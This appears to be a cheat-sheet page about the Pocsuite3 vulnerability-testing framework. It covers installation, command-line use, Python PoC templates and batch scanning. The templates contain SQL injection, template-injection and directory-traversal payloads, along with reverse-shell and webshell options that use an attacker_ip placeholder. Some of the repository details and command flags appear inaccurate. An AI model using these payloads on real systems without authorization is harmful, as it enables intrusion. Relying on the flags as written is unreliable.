Aller au contenu
1337skills 1337skills - Aide-mémoires

Pocsuite3

Overview

Section intitulée « Overview »

Pocsuite3 is a powerful, open-source vulnerability testing framework written in Python. It provides a comprehensive platform for security researchers to develop, test, and deploy Proof-of-Concept (PoC) exploits. Pocsuite3 supports multiple protocols, payload delivery methods, and includes built-in vulnerability databases, making it ideal for authorized security assessments and research.

Installation

Section intitulée « Installation »

Linux (Debian/Ubuntu)

Section intitulée « Linux (Debian/Ubuntu) »
sudo apt-get install python3 python3-pip
pip3 install pocsuite3

Fedora/RHEL

Section intitulée « Fedora/RHEL »
sudo dnf install python3 python3-pip
pip3 install pocsuite3

macOS

Section intitulée « macOS »
brew install python3
pip3 install pocsuite3

Windows

Section intitulée « Windows »
pip install pocsuite3

From Source

Section intitulée « From Source »
git clone https://github.com/projectdiscovery/pocsuite3.git
cd pocsuite3
pip3 install -r requirements.txt
python3 setup.py install

Verify Installation

Section intitulée « Verify Installation »
pocsuite3 --version
pocsuite3 --help

Core Concepts

Section intitulée « Core Concepts »

PoC Script Structure

Section intitulée « PoC Script Structure »

Pocsuite3 PoCs follow a specific framework structure with metadata, options, and verification methods.

Vulnerability Database Integration

Section intitulée « Vulnerability Database Integration »

Pocsuite3 includes built-in access to:

  • Official Pocsuite3 database
  • ExploitDB integration
  • NVD vulnerability data
  • Custom local databases

Payload Delivery Methods

Section intitulée « Payload Delivery Methods »
  • Direct execution
  • WebShell payload delivery
  • Reverse shell generation
  • Custom payload encoding

Basic Commands

Section intitulée « Basic Commands »

Test Single Target

Section intitulée « Test Single Target »
pocsuite3 -u http://target.com --poc poc_name
pocsuite3 -u http://target.com:8080 --poc vulnerable_cms

Test Multiple Targets

Section intitulée « Test Multiple Targets »
pocsuite3 -f targets.txt --poc poc_name
pocsuite3 -f urls.txt --poc exploit_name -v 2

List Available PoCs

Section intitulée « List Available PoCs »
pocsuite3 --list
pocsuite3 --list | grep keyword

Search PoC Database

Section intitulée « Search PoC Database »
pocsuite3 --search keyword
pocsuite3 --search cve_name
pocsuite3 --search "directory traversal"

Common Usage Patterns

Section intitulée « Common Usage Patterns »
CommandDescription
pocsuite3 -u URL --poc nameTest target with specific PoC
pocsuite3 -f targets.txt --poc nameTest multiple targets from file
pocsuite3 -u URL --poc-dir ./pocsUse custom PoC directory
pocsuite3 -u URL --poc name -v 2Verbose output (level 2)
pocsuite3 --search keywordSearch PoC database
pocsuite3 -u URL --poc name --attackExecute in attack mode
pocsuite3 -u URL --poc name --verifyRun in verification mode only

PoC Development

Section intitulée « PoC Development »

Basic PoC Template

Section intitulée « Basic PoC Template »
from pocsuite3.api import *
import urllib.request

class PocName(POCBase):
    vulID = "CVE-XXXX-XXXXX"
    version = "1"
    author = ["Your Name"]
    vulDate = "2024-01-15"
    createDate = "2024-01-16"
    updateDate = "2024-01-16"
    references = ["https://example.com"]
    name = "Vulnerable Application RCE"
    appPowerLink = ""
    appName = "Vulnerable App"
    appVersion = ""
    vulType = "Remote Code Execution"
    desc = """
    Detailed vulnerability description here.
    Steps to reproduce and impact assessment.
    """
    samples = ["http://target.com"]
    install_requires = ["requests"]
    def _check(self):
        result = {}
        try:
            resp = requests.get(self.url, timeout=10)
            if "vulnerable_string" in resp.text:
                result["VerifyInfo"] = {}
                result["VerifyInfo"]["URL"] = self.url
        except Exception as e:
            pass
        return self.parse_result(result)
    def _exploit(self):
        result = {}
        payload = "malicious_payload"
        try:
            resp = requests.post(
                self.url,
                data={"param": payload},
                timeout=10
            )
            if "success_indicator" in resp.text:
                result["ShellInfo"] = {
                    "URL": self.url,
                    "Content": resp.text
                }
        except Exception as e:
            pass
        return self.parse_result(result)

Complete PoC with Parameter Options

Section intitulée « Complete PoC with Parameter Options »
from pocsuite3.api import *

class VulnerableAPIPoc(POCBase):
    vulID = "CVE-2024-00000"
    version = "1.1"
    author = ["Security Researcher"]
    references = ["https://nvd.nist.gov"]
    name = "Vulnerable API Endpoint Exploitation"
    appName = "Vulnerable Service"
    vulType = "SQL Injection / RCE"
    desc = "Detailed vulnerability description"
    samples = ["http://example.com"]
    
    def _options(self):
        return {
            "command": {
                "value": "id",
                "description": "Command to execute",
                "require": False
            },
            "timeout": {
                "value": 10,
                "description": "Request timeout",
                "require": False
            }
        }
    
    def _check(self):
        result = {}
        try:
            payload = "' OR '1'='1"
            resp = requests.get(
                f"{self.url}/api/endpoint",
                params={"id": payload}
            )
            if resp.status_code == 200 and "data" in resp.text:
                result["VerifyInfo"] = {"URL": self.url}
        except:
            pass
        return self.parse_result(result)
    
    def _exploit(self):
        result = {}
        cmd = self.get_option("command")
        try:
            payload = f"'; exec('{cmd}'); --"
            resp = requests.get(
                f"{self.url}/api/endpoint",
                params={"id": payload}
            )
            if resp.status_code == 200:
                result["ShellInfo"] = {
                    "URL": self.url,
                    "Output": resp.text
                }
        except:
            pass
        return self.parse_result(result)

Running PoCs

Section intitulée « Running PoCs »

Verification Mode (Safe)

Section intitulée « Verification Mode (Safe) »
pocsuite3 -u http://target.com --poc cve_name --verify

Attack/Exploit Mode

Section intitulée « Attack/Exploit Mode »
pocsuite3 -u http://target.com --poc cve_name --attack

With Custom Options

Section intitulée « With Custom Options »
pocsuite3 -u http://target.com --poc name -o "command=whoami"
pocsuite3 -u http://target.com --poc name -o "lhost=192.168.1.100,lport=4444"

Batch Testing from File

Section intitulée « Batch Testing from File »
pocsuite3 -f urls.txt --poc cve_name --attack
pocsuite3 -f targets.txt --poc cve_name -v 2 --report report.json

Advanced Options

Section intitulée « Advanced Options »

Concurrency Control

Section intitulée « Concurrency Control »
pocsuite3 -u http://target.com --poc name --threads 5
pocsuite3 -f targets.txt --poc name --threads 20

Output Formats

Section intitulée « Output Formats »
pocsuite3 -u URL --poc name --report report.json
pocsuite3 -u URL --poc name --report report.html
pocsuite3 -u URL --poc name --report report.txt

Proxy Configuration

Section intitulée « Proxy Configuration »
pocsuite3 -u URL --poc name --proxy http://127.0.0.1:8080
pocsuite3 -u URL --poc name --proxy socks5://127.0.0.1:1080

Custom User Agent

Section intitulée « Custom User Agent »
pocsuite3 -u URL --poc name --user-agent "Custom UA"

Timeout Settings

Section intitulée « Timeout Settings »
pocsuite3 -u URL --poc name --timeout 30

PoC Database Operations

Section intitulée « PoC Database Operations »

Update Local Database

Section intitulée « Update Local Database »
pocsuite3 --update

Search by CVE

Section intitulée « Search by CVE »
pocsuite3 --search CVE-2024-12345
pocsuite3 --search "CVE-2024"

Search by Application

Section intitulée « Search by Application »
pocsuite3 --search "Apache Struts"
pocsuite3 --search "WordPress"

Search by Vulnerability Type

Section intitulée « Search by Vulnerability Type »
pocsuite3 --search "RCE"
pocsuite3 --search "SQL Injection"
pocsuite3 --search "Directory Traversal"

Display PoC Details

Section intitulée « Display PoC Details »
pocsuite3 --show cve_id
pocsuite3 --show CVE-2024-00000

Working with Custom PoCs

Section intitulée « Working with Custom PoCs »

Directory Structure

Section intitulée « Directory Structure »
custom_pocs/
├── poc_rce_exploit.py
├── poc_sql_injection.py
├── poc_directory_traversal.py
└── utils/
    ├── helper.py
    └── payloads.txt

Load Custom PoC Directory

Section intitulée « Load Custom PoC Directory »
pocsuite3 -u http://target.com --poc-dir ./custom_pocs --poc poc_name
pocsuite3 -f targets.txt --poc-dir ./exploits --poc vulnerability

Test Custom PoC Syntax

Section intitulée « Test Custom PoC Syntax »
pocsuite3 --check-poc ./custom_pocs/poc_name.py

Payload Delivery

Section intitulée « Payload Delivery »

Reverse Shell Payload

Section intitulée « Reverse Shell Payload »
pocsuite3 -u URL --poc name -o "lhost=attacker_ip,lport=4444"

WebShell Deployment

Section intitulée « WebShell Deployment »
pocsuite3 -u URL --poc webshell_poc -o "shell_path=/uploads/shell.php"

Custom Payload Encoding

Section intitulée « Custom Payload Encoding »
def _exploit(self):
    payload = base64.b64encode(b"command").decode()
    resp = requests.post(
        f"{self.url}/api",
        data={"data": payload}
    )

Exploitation Techniques

Section intitulée « Exploitation Techniques »

SQL Injection PoC

Section intitulée « SQL Injection PoC »
def _check(self):
    result = {}
    test_payload = "' OR '1'='1"
    resp = requests.get(f"{self.url}?id={test_payload}")
    if "error" not in resp.text and len(resp.text) > expected_length:
        result["VerifyInfo"] = {"URL": self.url}
    return self.parse_result(result)

Remote Code Execution PoC

Section intitulée « Remote Code Execution PoC »
def _exploit(self):
    result = {}
    cmd = "whoami"
    payload = f"{{{{7*7}}}}"
    resp = requests.get(f"{self.url}/api?input={payload}")
    if "49" in resp.text:
        result["ShellInfo"] = {"URL": self.url, "Command": cmd}
    return self.parse_result(result)

Directory Traversal PoC

Section intitulée « Directory Traversal PoC »
def _check(self):
    result = {}
    traversal_payload = "../../../../etc/passwd"
    resp = requests.get(f"{self.url}/download?file={traversal_payload}")
    if "root:" in resp.text:
        result["VerifyInfo"] = {"URL": self.url}
    return self.parse_result(result)

Reporting and Output

Section intitulée « Reporting and Output »

Generate JSON Report

Section intitulée « Generate JSON Report »
pocsuite3 -f targets.txt --poc name --report results.json

Generate HTML Report

Section intitulée « Generate HTML Report »
pocsuite3 -f targets.txt --poc name --report results.html

Parse Results

Section intitulée « Parse Results »
cat results.json | jq '.results[] | {target: .target, vulnerable: .status}'

Export Successful Targets

Section intitulée « Export Successful Targets »
pocsuite3 -f targets.txt --poc name --report results.json
cat results.json | jq '.results[] | select(.status == "success") | .target' > vulnerable_targets.txt

Vulnerability Scanning Workflow

Section intitulée « Vulnerability Scanning Workflow »

Step 1: Prepare Target List

Section intitulée « Step 1: Prepare Target List »
cat targets.txt
# http://target1.com
# http://target2.com:8080
# http://target3.com/app

Step 2: Search for Relevant PoCs

Section intitulée « Step 2: Search for Relevant PoCs »
pocsuite3 --search "web application vulnerability"

Step 3: Run Verification

Section intitulée « Step 3: Run Verification »
pocsuite3 -f targets.txt --poc cve_name --verify

Step 4: Generate Report

Section intitulée « Step 4: Generate Report »
pocsuite3 -f targets.txt --poc cve_name --report assessment.html

Step 5: Analyze Results

Section intitulée « Step 5: Analyze Results »
cat assessment.html

Integration with Other Tools

Section intitulée « Integration with Other Tools »

With Nuclei

Section intitulée « With Nuclei »
# Export Pocsuite3 findings to file
pocsuite3 -f targets.txt --poc name --report findings.json

With Burp Suite

Section intitulée « With Burp Suite »
pocsuite3 -u URL --poc name --proxy http://127.0.0.1:8080

With Metasploit

Section intitulée « With Metasploit »
# Use Pocsuite3 PoCs alongside Metasploit modules
pocsuite3 -f targets.txt --poc name --report msf_compatible.txt

Best Practices

Section intitulée « Best Practices »
  • Authorization: Always obtain written authorization before testing
  • Documentation: Document all PoCs with proper references and descriptions
  • Testing: Validate PoCs in controlled environments first
  • Responsible Disclosure: Follow coordinated disclosure practices
  • Version Control: Track PoC changes and updates
  • Error Handling: Include proper exception handling in exploit code
  • Stealth: Use appropriate timeouts and request patterns
  • Verification: Distinguish between verification and exploitation modes

Troubleshooting

Section intitulée « Troubleshooting »

Connection Timeout

Section intitulée « Connection Timeout »
pocsuite3 -u URL --poc name --timeout 30

SSL/TLS Certificate Issues

Section intitulée « SSL/TLS Certificate Issues »
pocsuite3 -u URL --poc name --verify-ssl false

Module Import Errors

Section intitulée « Module Import Errors »
pip3 install -r requirements.txt
pocsuite3 --check-poc poc_name.py

Debugging PoC Execution

Section intitulée « Debugging PoC Execution »
pocsuite3 -u URL --poc name -v 3
Section intitulée « Related Tools »
  • Nuclei: Template-based vulnerability scanning
  • Metasploit: Comprehensive exploitation framework
  • Burp Suite: Web application security testing
  • OWASP ZAP: Automated security testing
  • Exploit-DB: Vulnerability and exploit database